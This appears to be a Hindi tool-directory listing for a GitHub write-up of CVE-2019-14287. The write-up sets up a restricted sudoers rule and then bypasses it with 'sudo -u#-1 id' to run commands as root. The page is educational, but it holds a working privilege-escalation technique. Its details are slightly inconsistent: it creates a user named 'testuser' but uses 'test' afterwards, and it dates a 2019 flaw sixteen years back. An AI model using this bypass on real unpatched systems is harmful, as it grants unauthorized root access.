Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-14287-write-up — CVE-2019-14287 sudo भेद्यता का चरण-दर-चरण प्रदर्शन जो प्रतिबंधित उपयोगकर्ताओं को निर्मित उपयोगकर्ता आईडी के माध्यम से रूट के रूप में कमांड निष्पादित करने की अनुमति देता है | Kitploit
उपकरण/GitHubGitHub/gurneesh/cve-2019-14287-write-up
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubgurneesh/cve-2019-14287-write-up

CVE-2019-14287-write-up

CVE-2019-14287 sudo भेद्यता का चरण-दर-चरण प्रदर्शन जो प्रतिबंधित उपयोगकर्ताओं को निर्मित उपयोगकर्ता आईडी के माध्यम से रूट के रूप में कमांड निष्पादित करने की अनुमति देता है

रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
16 साल पहलेअभी तक समीक्षित नहीं

CVE-2019-14287-write-up

4294967295 सुडो बग प्रतिबंधित उपयोगकर्ताओं को रूट के रूप में कमांड चलाने की अनुमति देता है

कमज़ोरी का प्रदर्शन

एक नया उपयोगकर्ता जोड़ें:

sudo su - root useradd -m -s /bin/bash testuser passwd testuser // पासवर्ड जोड़ें visudo

एक नई प्रविष्टि जोड़ें

test ALL=(ALL, !root) /usr/bin/id // यह निर्दिष्ट करना कि यह उपयोगकर्ता रूट उपयोगकर्ता के साथ id कमांड का उपयोग नहीं कर सकता

फ़ाइल सहेजें और रूट उपयोगकर्ता से बाहर निकलें

परीक्षण उपयोगकर्ता में लॉगिन करें

sudo su - test

कमांड लिखें

sudo id आपको संदेश दिखाई देगा: क्षमा करें, उपयोगकर्ता test को '/usr/bin/id' को रूट के रूप में निष्पादित करने की अनुमति नहीं है

अब कमांड लिखें

sudo -u#-1 id या sudo -u#4294967295 id

और देखिए, आपने रूट का उपयोग करके id कमांड निष्पादित कर लिया है

टूल डाउनलोड करें